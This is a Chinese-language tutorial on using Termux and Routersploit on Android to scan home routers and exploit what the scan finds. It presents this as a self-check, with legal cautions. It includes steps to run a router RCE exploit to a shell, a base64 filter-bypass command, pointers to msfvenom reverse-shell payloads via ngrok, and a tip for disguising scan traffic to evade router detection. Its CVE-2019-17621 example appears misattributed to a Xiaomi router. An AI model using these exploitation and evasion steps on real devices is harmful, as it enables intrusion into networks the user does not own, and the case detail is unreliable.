1. 为什么要在安卓手机上检测路由器安全?
家里用的路由器就像网络世界的看门人,它负责把互联网连接分配给手机、电脑、智能家电。但很多人不知道,这个"看门人"可能自己就漏洞百出。去年某安全机构抽查发现,市面上76%的家用路由器存在高危漏洞,黑客可以利用这些漏洞窃取你的聊天记录、监控摄像头画面,甚至偷偷用你的网络做违法的事情。
传统检测方法要么需要电脑,要么得root手机(相当于给手机做开胸手术)。而Termux+Routersploit的组合就像给你的安卓手机装了个便携式安全扫描仪,不用root就能快速给路由器做"体检"。我去年用这个方法扫了朋友家的老款TP-Link路由器,十分钟就发现了三个未修复的漏洞,吓得他当天就更新了固件。
2. 零基础搭建Termux渗透环境
2.1 Termux基础配置
首先去F-Droid官网下载Termux(比Google Play版本更新更稳定)。安装完成后别急着操作,先做这三件事:
- 换国内源加速下载(否则安装依赖会慢到怀疑人生):
sed -i 's@^\(deb.*stable main\)$@#\1\ndeb https://mirrors.tuna.tsinghua.edu.cn/termux/termux-packages-24 stable main@' $PREFIX/etc/apt/sources.list- 更新软件库并安装基础工具:
pkg update && pkg upgrade -y pkg install git wget nano -y- 配置存储权限(否则无法访问下载的文件):
termux-setup-storage遇到过最坑的问题是键盘无法输入方向键,解决方法是在Termux设置里开启"Extra Keys",会显示一排虚拟功能键。
2.2 安装Routersploit全家桶
官方教程会直接让你装Python,但实测在ARM架构的安卓机上会报错。正确姿势是分步安装:
# 先装必要依赖 pkg install python rust libffi-static ncurses-static openssl-tool -y # 单独安装pip(注意要用python3.11版本) curl -s https://bootstrap.pypa.io/get-pip.py | python3.11 # 克隆项目(建议用国内镜像加速) git clone https://ghproxy.com/https://github.com/threatcode/routersploit cd routersploit # 安装依赖时跳过错误(关键步骤!) pip3 install --upgrade pip wheel pip3 install -r requirements.txt --ignore-installed常见报错处理:
- 遇到"error: command 'arm-linux-androideabi-clang' failed":先执行
export CARGO_BUILD_TARGET=armv7-linux-androideabi - 内存不足导致编译失败:在Termux里输入
ulimit -s 8192临时扩大栈空间
3. 实战扫描路由器漏洞
3.1 快速上手autopwn扫描
启动工具前先确认手机和路由器在同一WiFi下(不能用移动数据),然后:
python3 rsf.py use scanners/autopwn set target 192.168.1.1 # 改成你家路由器IP run扫描过程中会看到大量[+][-][*]标记:
- [+] 像体检报告的"异常指标",代表发现明确漏洞
- [-] 相当于"各项指标正常"
- [*] 类似"需要进一步检查",可能是网络波动导致的误报
实测扫描耗时参考:
- 新款华为路由器约8分钟
- 老旧腾达路由器可能超过20分钟
3.2 深度漏洞验证技巧
当autopwn发现漏洞后,比如显示[+] routers/dlink/dir_300_600_rce,可以这样验证:
use exploits/routers/dlink/dir_300_600_rce set target 192.168.1.1 check # 二次确认漏洞是否存在 run成功时会看到Command shell opened提示,此时可以尝试执行cat /etc/passwd等基础命令。但要注意:
- 某些路由器会限制命令长度
- 避免使用reboot等危险命令
- 测试完务必输入
exit退出
遇到过最奇葩的情况是某品牌路由器会把"&&"字符过滤成"XX",这时候就要用$(echo Y3VybA==|base64 -d)这种base64编码绕过。
4. 安全防护与结果解读
4.1 漏洞严重性分级
根据CVSS评分标准,家庭用户需要特别关注:
- 7分以上高危漏洞:可能导致远程控制(应立即升级固件)
- 4-6分中危漏洞:如信息泄露(建议修改默认密码)
- 3分以下低危漏洞:通常影响不大
4.2 修复建议速查表
| 漏洞类型 | 应急措施 | 长期方案 |
|---|---|---|
| 默认凭证 | 立即修改admin密码 | 启用WPA3加密 |
| 命令注入 | 关闭远程管理 | 升级最新固件 |
| 缓冲区溢出 | 禁用UPnP功能 | 更换支持自动更新的设备 |
曾帮朋友处理过一个真实案例:他的小米路由器显示[+] CVE-2019-17621漏洞,攻击者可以利用这个漏洞在30秒内完全控制设备。临时解决方案是在防火墙规则里drop掉32400端口,最终通过刷第三方固件彻底解决。
5. 法律边界与进阶技巧
所有测试务必在自购路由器上进行。有次我在星巴克连WiFi时手痒想扫描,突然想起这可能违反《网络安全法》第27条,赶紧停手。建议测试前书面记录设备SN码和测试时间。
对技术爱好者来说,可以尝试:
- 用
msfvenom生成反向shell payload - 结合
ngrok实现内网穿透 - 编写自定义exploit模块(需要Python基础)
有个冷知识:部分新款路由器会检测autopwn扫描特征,这时候可以修改core/exploit.py里的User-Agent字段,伪装成普通浏览器流量。